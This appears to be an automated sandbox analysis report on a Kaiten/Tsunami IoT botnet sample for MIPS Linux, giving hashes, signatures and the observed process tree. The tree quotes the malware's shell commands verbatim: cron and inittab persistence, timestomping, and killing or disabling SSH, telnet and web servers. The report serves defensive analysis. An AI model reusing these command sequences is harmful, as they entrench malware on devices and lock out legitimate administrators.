Analysis
-
max time kernel
19s -
max time network
12s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
20-10-2024 07:46
Static task
static1
Behavioral task
behavioral1
Sample
2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1
Resource
debian9-mipsbe-20240611-en
General
-
Target
2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1
-
Size
510KB
-
MD5
5d75670fdc5531ef09ec12de7fa8ab34
-
SHA1
8695057628cf9a12f97e260694dbfc50138cf0dd
-
SHA256
2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1
-
SHA512
6fd21a9554f00e4ab77401048a6a6361b1aa0c991ddfdd8a2b4938f4f95690dbd62c5c3b56b819fce10c0953a56a2e99d7d618778f269c5dd496e87ee7c91ea1
-
SSDEEP
12288:6N/85i/pHqAyIJQenHqDsOnXRQI6Z6udA56hsrIr5H+NIG/:oQcpKLK7oan7d00r5eX
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource | yara_rule
behavioral1/memory/712-1-0x00400000-0x00568718-memory.dmp | family_kaiten2
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description | ioc | Process
File opened for modification | /var/spool/cron/crontabs/tmp.fUi7Ok | crontab
Enumerates running processes
Discovers information about currently running processes on the system
-
Indicator Removal: Timestomp 1 TTPs 4 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
pid | Process
756 | sh
757 | touch
720 | sh
723 | touch
Enumerates kernel/hardware configuration 1 TTPs 9 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description | ioc | Process
File opened for reading | /sys/fs/kdbus/0-system/bus | systemctl (9 occurrences)
description | ioc | Process
File opened for reading | /proc/704/stat, /proc/784/stat, /proc/235/stat, /proc/473/stat, /proc/6/stat, /proc/14/stat, /proc/72/stat, /proc/321/stat, /proc/11/stat, /proc/20/stat, /proc/3/stat, /proc/6/stat, /proc/18/stat, /proc/77/stat, /proc/812/stat, /proc/16/stat, /proc/777/stat, /proc/380/stat, /proc/18/stat, /proc/72/stat, /proc/14/stat, /proc/83/stat, /proc/480/stat, /proc/74/stat, /proc/13/stat, /proc/775/stat, /proc/139/stat, /proc/322/stat, /proc/480/stat, /proc/76/stat, /proc/78/stat, /proc/76/stat, /proc/16/stat, /proc/14/stat, /proc/81/stat, /proc/796/stat, /proc/806/stat, /proc/1/stat, /proc/480/stat, /proc/11/stat, /proc/508/stat, /proc/10/stat, /proc/16/stat, /proc/77/stat, /proc/235/stat, /proc/709/stat, /proc/18/stat, /proc/69/stat, /proc/759/stat, /proc/5/stat, /proc/759/stat, /proc/235/stat, /proc/759/stat | killall
File opened for reading | /proc/721/cmdline, /proc/759/cmdline, /proc/705/cmdline, /proc/704/cmdline, /proc/705/cmdline, /proc/139/cmdline | killall
File opened for reading | /proc/1/environ, /proc/cmdline, /proc/1/environ, /proc/cmdline | systemctl
File opened for reading | /proc/filesystems | crontab
Processes
-
/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1  /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1  PID:712
  /bin/sh  sh -c "touch -acmr /bin/ls /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1"  PID:720
    - Indicator Removal: Timestomp
    /usr/bin/touch  touch -acmr /bin/ls /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1  PID:723
      - Indicator Removal: Timestomp
  /bin/sh  sh -c "(crontab -l | grep -v \"/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"  PID:725
    /usr/bin/crontab  crontab -l  PID:727
      - Reads runtime system information
    /bin/grep  grep -v "no cron"  PID:729
    /bin/grep  grep -v /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1  PID:728
    /bin/grep  grep -v lesshts/run.sh  PID:730
  /bin/sh  sh -c "echo \"* * * * * /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"  PID:734
  /bin/sh  sh -c "crontab /var/run/.x00740882966"  PID:735
    /usr/bin/crontab  crontab /var/run/.x00740882966  PID:737
      - Creates/modifies Cron job
  /bin/sh  sh -c "rm -rf /var/run/.x00740882966"  PID:741
    /bin/rm  rm -rf /var/run/.x00740882966  PID:743
  /bin/sh  sh -c "cat /etc/inittab | grep -v \"/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1\" > /etc/inittab2"  PID:744
    /bin/cat  cat /etc/inittab  PID:746
    /bin/grep  grep -v /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1  PID:747
  /bin/sh  sh -c "echo \"0:2345:respawn:/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1\" >> /etc/inittab2"  PID:750
  /bin/sh  sh -c "cat /etc/inittab2 > /etc/inittab"  PID:751
    /bin/cat  cat /etc/inittab2  PID:752
  /bin/sh  sh -c "rm -rf /etc/inittab2"  PID:753
    /bin/rm  rm -rf /etc/inittab2  PID:754
  /bin/sh  sh -c "touch -acmr /bin/ls /etc/inittab"  PID:756
    - Indicator Removal: Timestomp
    /usr/bin/touch  touch -acmr /bin/ls /etc/inittab  PID:757
      - Indicator Removal: Timestomp
  /bin/sh  sh -c "/bin/uname -n"  PID:760
    /bin/uname  /bin/uname -n  PID:761
  /bin/sh  sh -c "/bin/uname -n"  PID:762
    /bin/uname  /bin/uname -n  PID:763
  /bin/sh  sh -c "/bin/uname -n"  PID:764
    /bin/uname  /bin/uname -n  PID:766
  /bin/sh  sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"  PID:771
    /bin/cat  cat /var/run/httpd.pid  PID:774
  /bin/sh  sh -c "service httpd stop > /dev/null 2>&1 &"  PID:773
  /bin/sh  sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"  PID:776
  /bin/sh  sh -c "killall -9 minihttpd > /dev/null 2>&1 &"  PID:778
  /bin/sh  sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"  PID:781
    /bin/cat  cat /var/run/thttpd.pid  PID:785
  /bin/sh  sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"  PID:784
  /bin/sh  sh -c "nvram set http_enable=0 > /dev/null 2>&1"  PID:787
  /bin/sh  sh -c "killall -9 httpd > /dev/null 2>&1 &"  PID:788
  /bin/sh  sh -c "service telnetd stop > /dev/null 2>&1 &"  PID:790
  /bin/sh  sh -c "service sshd stop > /dev/null 2>&1 &"  PID:794
  /bin/sh  sh -c "killall -9 telnetd > /dev/null 2>&1 &"  PID:797
  /bin/sh  sh -c "killall -9 utelnetd > /dev/null 2>&1 &"  PID:800
  /bin/sh  sh -c "killall -9 dropbear > /dev/null 2>&1 &"  PID:804
  /bin/sh  sh -c "killall -9 sshd > /dev/null 2>&1 &"  PID:807
  /bin/sh  sh -c "killall -9 lighttpd > /dev/null 2>&1 &"  PID:810
/usr/sbin/service  service httpd stop  PID:775
  /usr/bin/basename  basename /usr/sbin/service  PID:779
  /usr/bin/basename  basename /usr/sbin/service  PID:782
  /bin/systemctl  systemctl --quiet is-active multi-user.target  PID:786
    - Enumerates kernel/hardware configuration
  /bin/systemctl  systemctl list-unit-files --full "--type=socket"  PID:793
    - Enumerates kernel/hardware configuration
  /bin/sed  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"  PID:795
/usr/bin/killall  killall -9 mini_httpd  PID:777
  - Reads runtime system information
/usr/bin/killall  killall -9 minihttpd  PID:780
  - Reads runtime system information
/usr/bin/killall  killall -9 httpd  PID:789
  - Reads runtime system information
/usr/sbin/service  service telnetd stop  PID:791
  /usr/bin/basename  basename /usr/sbin/service  PID:798
  /usr/bin/basename  basename /usr/sbin/service  PID:802
  /bin/systemctl  systemctl --quiet is-active multi-user.target  PID:808
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
  /bin/systemctl  systemctl list-unit-files --full "--type=socket"  PID:816
    - Enumerates kernel/hardware configuration
  /bin/sed  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"  PID:817
/usr/sbin/service  service sshd stop  PID:796
  /usr/bin/basename  basename /usr/sbin/service  PID:801
  /usr/bin/basename  basename /usr/sbin/service  PID:805
  /bin/systemctl  systemctl --quiet is-active multi-user.target  PID:811
    - Enumerates kernel/hardware configuration
  /bin/systemctl  systemctl list-unit-files --full "--type=socket"  PID:819
    - Enumerates kernel/hardware configuration
  /bin/sed  sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"  PID:820
/usr/bin/killall  killall -9 telnetd  PID:799
  - Reads runtime system information
/usr/bin/killall  killall -9 utelnetd  PID:803
  - Reads runtime system information
/usr/local/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop httpd.service  PID:775
/usr/local/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop httpd.service  PID:775
/usr/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop httpd.service  PID:775
/usr/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop httpd.service  PID:775
/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop httpd.service  PID:775
/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop httpd.service  PID:775
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
/usr/bin/killall  killall -9 dropbear  PID:806
  - Reads runtime system information
/usr/bin/killall  killall -9 sshd  PID:809
  - Reads runtime system information
/usr/bin/killall  killall -9 lighttpd  PID:812
  - Reads runtime system information
/usr/local/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop telnetd.service  PID:791
/usr/local/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop telnetd.service  PID:791
/usr/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop telnetd.service  PID:791
/usr/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop telnetd.service  PID:791
/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop telnetd.service  PID:791
/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop telnetd.service  PID:791
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
/usr/local/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop sshd.service  PID:796
/usr/local/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop sshd.service  PID:796
/usr/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop sshd.service  PID:796
/usr/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop sshd.service  PID:796
/sbin/systemctl  systemctl "--job-mode=ignore-dependencies" stop sshd.service  PID:796
/bin/systemctl  systemctl "--job-mode=ignore-dependencies" stop sshd.service  PID:796
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
85B
MD5 64d27c0537149a56cdb8523e1788165d
SHA1 f97277c411ae7d8f8a29273ba350354edd8bb7ba
SHA256 424ae8d6d745d605066cd998839960610fc89db729b661302b906a64dc9a03f6
SHA512 22fcfc86634f9890d6b1b3ada638056246183c1add2c24d963ebe32de0ceb0215a5ca9a67b523fdedb317feb6f1def6fea724eec9a09aa5c8219b8c0ebf31b10
-
Filesize
99B
MD5 2fbba492e00bc251961957fc02be650b
SHA1 fc235925acf63d5c4984c23276121925b3d36ca7
SHA256 a5203fec4e7b3593af2f746cbae83019a012536cc24e4dc9a3bcb4e8bc3248f4
SHA512 5ce23151c6ad61f09a0df3064d6a9bd33c901810eaafc549eec2b9fba13193a35af1f99fc1fa573d2a95a3edf35ef4d6089f762c278d2ac5f2eb763c6e014f53
-
Filesize
295B
MD5 c9a0cbc88dc1235bbc6284b887a0d2c2
SHA1 631727e95ca35b2d759cae81b952c083bc13fb62
SHA256 e84614442cfffb22a039c4c912b6d578b239bdca5b5225a4e3f5365ebaf6875a
SHA512 b79f8c174d71fac1e6bc52956b8aec2a9b3f3dbe5d066ae4fcee4d5825d9855c73d8ba54beb28308d7f46950d943f640a00cf845b6e720c48251ed9fe559a90e